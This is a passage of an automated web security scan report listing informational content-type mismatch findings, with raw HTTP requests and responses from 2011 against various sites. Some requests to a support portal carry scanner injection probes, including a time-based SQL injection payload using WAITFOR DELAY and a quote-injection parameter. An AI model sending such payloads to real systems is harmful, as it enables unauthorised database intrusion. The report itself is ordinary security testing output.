Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.4.10.1303741218; WEB_CH_C=webalta_cookies

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:30:19 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=20
X-Powered-By: PHP/5.2.9
Content-Length: 170

.../* .... .....
*/
.theme_header { background: #7A96A7 url("/public/visual/themes/theme1/top.png"); }

/* .... ....
*/
.theme_body { background: #52677A; }
35.55. http://netsuite-www.baynote.net/baynote/tags2/guide/results-products/netsuite-www  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://netsuite-www.baynote.net
Path:   /baynote/tags2/guide/results-products/netsuite-www

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /baynote/tags2/guide/results-products/netsuite-www?userId=6923519460848807096&customerId=netsuite&code=www&id=0&guide=ContentGuide&resultsPerPage=5&referrer=http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fpage_not_found.shtml&url=http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fproducts%2Fecommerce%2Fwebsite-hosting.shtml&appendParams=&rankParam=&condition=d%26g%26s&v=1 HTTP/1.1
Host: netsuite-www.baynote.net
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/products/ecommerce/website-hosting.shtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: BNServer
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 15:20:58 GMT
Content-Length: 3626


bnTagManager.getTag(0).results = "<div class='bn_g_container' id='bn_guidecontainer0'><div class='bn_g_area' id='bn_guidearea0'><div class='bn_g_welcome' id='bn_guidewelcome0
...[SNIP]...
35.56. http://now.eloqua.com/visitor/v200/svrGP.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://now.eloqua.com
Path:   /visitor/v200/svrGP.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain a GIF image.

Request

GET /visitor/v200/svrGP.aspx?pps=3&siteid=2208&ref2=elqNone&tzo=360&ms=121 HTTP/1.1
Host: now.eloqua.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products?CMP=KNC-g-nbag&gclid=CLzn0qLPt6gCFQl_5Qod4S-RCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ELOQUA=GUID=8EE1D10DCCE142B68BB195EB59D8F5BA; ELQSTATUS=OK

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 12:52:48 GMT
Content-Length: 49

GIF89a...................!.......,...........T..;
35.57. http://pogoda.webalta.ru/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://pogoda.webalta.ru
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: pogoda.webalta.ru
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.2.10.1303741218; pogoda_reg=10290

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:23:34 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 04 Feb 2011 08:10:09 GMT
ETag: "da2ac4-37e-49b70691d1a40"
Accept-Ranges: bytes
Content-Length: 894
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... .........................................................................................................................................................................
...[SNIP]...
35.58. http://pogoda.webalta.ru/public/css/style-weather.css  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://pogoda.webalta.ru
Path:   /public/css/style-weather.css

Issue detail

The response contains the following Content-type statement:The response states that it contains CSS. However, it actually appears to contain unrecognised content.

Request

GET /public/css/style-weather.css?v1 HTTP/1.1
Host: pogoda.webalta.ru
Proxy-Connection: keep-alive
Referer: http://pogoda.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.2.10.1303741218; pogoda_reg=10290

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:22:09 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 11 Mar 2011 18:53:44 GMT
ETag: "8680f0-1c05-49e397b315e00"
Accept-Ranges: bytes
Content-Length: 7173
Connection: close
Content-Type: text/css

body {padding:0; margin:0 3px 10px; background-color:#FFF;}
body, a, div, td {font:normal 12px Tahoma; color:#666;}

a, a:hover {text-decoration:none;}
a:hover {text-decoration:underline;}

.lin
...[SNIP]...
35.59. http://pogoda.webalta.ru/public/js/search.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://pogoda.webalta.ru
Path:   /public/js/search.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /public/js/search.js?v1 HTTP/1.1
Host: pogoda.webalta.ru
Proxy-Connection: keep-alive
Referer: http://pogoda.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.2.10.1303741218; pogoda_reg=10290

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:21:25 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 15 Mar 2011 16:38:58 GMT
ETag: "8680d8-1c05-49e8810984c80"
Accept-Ranges: bytes
Content-Length: 7173
Connection: close
Content-Type: application/x-javascript

var my_sender = new sack("/zajax_search.php");
var city_sender = new sack("/zajax_set.php");

var seachBgOn = "#afdfff";
var seachBgOff = "#f2f6ff";

var search_sending = false;
var positioned
...[SNIP]...
35.60. http://secure.comodo.com/products/guessregion  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://secure.comodo.com
Path:   /products/guessregion

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /products/guessregion HTTP/1.1
Host: secure.comodo.com
Proxy-Connection: keep-alive
Referer: http://www.hackerguardian.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 16:28:42 GMT
Content-Type: text/javascript; charset=iso-8859-1
Connection: keep-alive
Keep-Alive: timeout=5
Cache-control: max-age=-1
Expires: Mon, 02 May 2011 16:28:42 GMT
Content-Length: 60

g_region = "North America";
g_country = "US";
updatePage();
35.61. http://server.iad.liveperson.net/hcp/html/mTag.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://server.iad.liveperson.net
Path:   /hcp/html/mTag.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /hcp/html/mTag.js?site=48536788 HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.internetreputationmanagement.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16601209214853,d=1303177644

Response

HTTP/1.1 200 OK
Content-Length: 17291
Content-Type: application/x-javascript
Content-Location: http://server.iad.liveperson.net/lpWeb/default_SMB//hcpv/emt/mtag.js?site=48536788
Last-Modified: Sun, 13 Mar 2011 22:27:52 GMT
Accept-Ranges: bytes
ETag: "e0f243e4cde1cb1:2e06"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 15:53:11 GMT

eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][
...[SNIP]...
35.62. http://smiimg.dt00.net/smi/2011/04/20110414khlopin-75x75.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://smiimg.dt00.net
Path:   /smi/2011/04/20110414khlopin-75x75.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /smi/2011/04/20110414khlopin-75x75.jpg HTTP/1.1
Host: smiimg.dt00.net
Proxy-Connection: keep-alive
Referer: http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:23 GMT
Content-Type: image/jpeg
Content-Length: 5395
Last-Modified: Thu, 14 Apr 2011 07:52:39 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Wed, 25 May 2011 14:21:23 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

GIF87aK.K.....
*T_....._R...*8\.......vsY:RL.8.xl|HV$#K...._P4JtULk.HA....QG.ao....kj<8_.l_..t.xm$.A.OC@$@...sK[.SL.m].xy|x..B=....mo..y$-CCj|:@.`T$0WTW|.l_ro....,Bjq9C|Rd....UJ....y|.aj....lnd(4....
...[SNIP]...
35.63. https://support.trust-guard.com/Netsparker2ddbbd3d9d9b4064a3ba2cd7fd8f6803.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://support.trust-guard.com
Path:   /Netsparker2ddbbd3d9d9b4064a3ba2cd7fd8f6803.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /Netsparker2ddbbd3d9d9b4064a3ba2cd7fd8f6803.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=dwygqqtavu1d244w838kq6z6jm9eea2r
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:08:57 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 25

No input file specified.
35.64. https://support.trust-guard.com/Netsparker32cc6d019ffb4cfaa4426fd037fc04ef.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://support.trust-guard.com
Path:   /Netsparker32cc6d019ffb4cfaa4426fd037fc04ef.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /Netsparker32cc6d019ffb4cfaa4426fd037fc04ef.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 18:59:05 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 25

No input file specified.
35.65. https://support.trust-guard.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://support.trust-guard.com
Path:   /index.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /index.php?_m=%2527&_a=submit HTTP/1.1
Referer: https://support.trust-guard.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:00:45 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 126

<br />
<b>Fatal error</b>: in <b>/homepages/9/d212015129/htdocs/support/includes/functions.php</b> on line <b>867</b><br />
35.66. https://support.trust-guard.com/themes/client_default/Netsparker13749997f7e349eeb0039a51b507d58d.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://support.trust-guard.com
Path:   /themes/client_default/Netsparker13749997f7e349eeb0039a51b507d58d.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /themes/client_default/Netsparker13749997f7e349eeb0039a51b507d58d.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid80=f49861fv13sl05grj1c1z7kmcn3wsand
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 18:59:42 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 25

No input file specified.
35.67. https://support.trust-guard.com/themes/client_default/index.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://support.trust-guard.com
Path:   /themes/client_default/index.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /themes/client_default/index.php?languageid= HTTP/1.1
Referer: https://support.trust-guard.com/themes/client_default/basejs.js
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid80=f49861fv13sl05grj1c1z7kmcn3wsand
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:00:11 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 25

No input file specified.
35.68. https://support.trust-guard.com/themes/client_default/staffonline.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://support.trust-guard.com
Path:   /themes/client_default/staffonline.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /themes/client_default/staffonline.gif HTTP/1.1
Host: support.trust-guard.com
Connection: keep-alive
Referer: http://www.trust-guard.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147269874.1166530582.1303748966.1303748966.1303748966.1; SWIFT_sessionid40=nnfa18si4n87mc68kwytxeynpprc2i1o; SWIFT_client=a%3A1%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid80=79aen2tq7o9d45p59q0nb8srhrs5qbvg; SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:11:30 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Last-Modified: Wed, 13 Jan 2010 02:19:32 GMT
ETag: "2c00339a-d42-4b4d2db4"
Accept-Ranges: bytes
Content-Length: 3394
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
Content-Type: image/gif

......JFIF.....d.d......Ducky.......F......Adobe.d......................................
.                .

.....
...........................

.............................................................0.d..
...[SNIP]...
35.69. https://support.trust-guard.com/visitor/Netsparkerb41a9abe8d5b422ab58d880203d103bd.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://support.trust-guard.com
Path:   /visitor/Netsparkerb41a9abe8d5b422ab58d880203d103bd.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /visitor/Netsparkerb41a9abe8d5b422ab58d880203d103bd.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A1%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid80=f49861fv13sl05grj1c1z7kmcn3wsand
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 18:59:15 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 25

No input file specified.
35.70. https://support.trust-guard.com/visitor/index.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://support.trust-guard.com
Path:   /visitor/index.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /visitor/index.php?_m=1;WAITFOR%20DELAY%20%270:0:25%27--&_a=htmlcode&departmentid=0&fullname=Smith&email=netsparker@example.com HTTP/1.1
Referer: https://support.trust-guard.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:06:17 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 126

<br />
<b>Fatal error</b>: in <b>/homepages/9/d212015129/htdocs/support/includes/functions.php</b> on line <b>867</b><br />
35.71. http://tengrinews.kz/static/js/remainNY.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://tengrinews.kz
Path:   /static/js/remainNY.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /static/js/remainNY.js HTTP/1.1
Host: tengrinews.kz
Proxy-Connection: keep-alive
Referer: http://tengrinews.kz/tag/891/?_openstat=ZGlyZWN0LnlhbmRleC5ydTsxOTgyMjk5OzczMDAyNTU7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=2s711rqep5c965kp1duse9cev3; sess=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%229d0d0366c112938578e0493b8d3e9f0f%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%29+Ap%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221303741246%22%3B%7Dff90da2a04be034fcd1d0a9e7c69a191

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 25 Apr 2011 14:36:39 GMT
Content-Type: application/javascript
Connection: keep-alive
Last-Modified: Fri, 21 Jan 2011 05:16:16 GMT
ETag: "be139-6c8-49a54597ae800"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1736

function newYearIn()
{
var days=" ........ "
var now = new Date();
var newYear = new Date("Jan,30,2011,00:00:00");
var totalRemains = (newYear.getTime()-now.getTime());
if (t
...[SNIP]...
35.72. http://track.pulse360.com/cgi-bin/tracker.cgi  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://track.pulse360.com
Path:   /cgi-bin/tracker.cgi

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /cgi-bin/tracker.cgi?id=92952183&type=signups HTTP/1.1
Host: track.pulse360.com
Proxy-Connection: keep-alive
Referer: http://www.reputationchanger.com/scheduled.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fc_ms_1.3=EA

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:06:11 GMT
Server: Apache
Connection: close
Content-Type: text/plain; charset=ISO-8859-1
Content-Length: 38

function successfully_converted() { }
35.73. http://translate.googleapis.com/translate_a/t  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://translate.googleapis.com
Path:   /translate_a/t

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

POST /translate_a/t?anno=3&client=te_lib&format=html&v=1.0 HTTP/1.1
Host: translate.googleapis.com
Proxy-Connection: keep-alive
Referer: http://webalta.ru/
Origin: http://webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 4036

q=%3Ca%20i%3D0%3E%D0%9F%D0%BE%D0%B8%D1%81%D0%BA%3C%2Fa%3E%3Ca%20i%3D1%3E%D0%9D%D0%BE%D0%B2%D0%BE%D1%81%D1%82%D0%B8%3C%2Fa%3E%3Ca%20i%3D2%3E%D0%90%D0%B2%D1%82%D0%BE%3C%2Fa%3E%3Ca%20i%3D3%3E%D0%9A%D0%B8
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:48:55 GMT
Expires: Mon, 25 Apr 2011 14:48:55 GMT
Cache-Control: private, max-age=600
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Type: text/javascript; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=5273502baf452368:TM=1303742935:LM=1303742935:S=EXx_U-Oas8EoHHIY; expires=Wed, 24-Apr-2013 14:48:55 GMT; path=/; domain=translate.googleapis.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Content-Length: 1713

["\x3ca i=0\x3eSearch\x3c/a\x3e \x3ca i=1\x3eNews\x3c/a\x3e \x3ca i=2\x3eAuto\x3c/a\x3e \x3ca i=3\x3eMovies\x3c/a\x3e \x3ca i=4\x3eWeather\x3c/a\x3e \x3ca i=5\x3eGames\x3c/a\x3e","My Page","All Ads","
...[SNIP]...
35.74. http://vkontakte.ru/js/lang0_0.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vkontakte.ru
Path:   /js/lang0_0.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /js/lang0_0.js?3340 HTTP/1.1
Host: vkontakte.ru
Proxy-Connection: keep-alive
Referer: http://vkontakte.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: remixchk=5

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Mon, 25 Apr 2011 14:23:41 GMT
Content-Type: text/javascript; charset=windows-1251
Connection: keep-alive
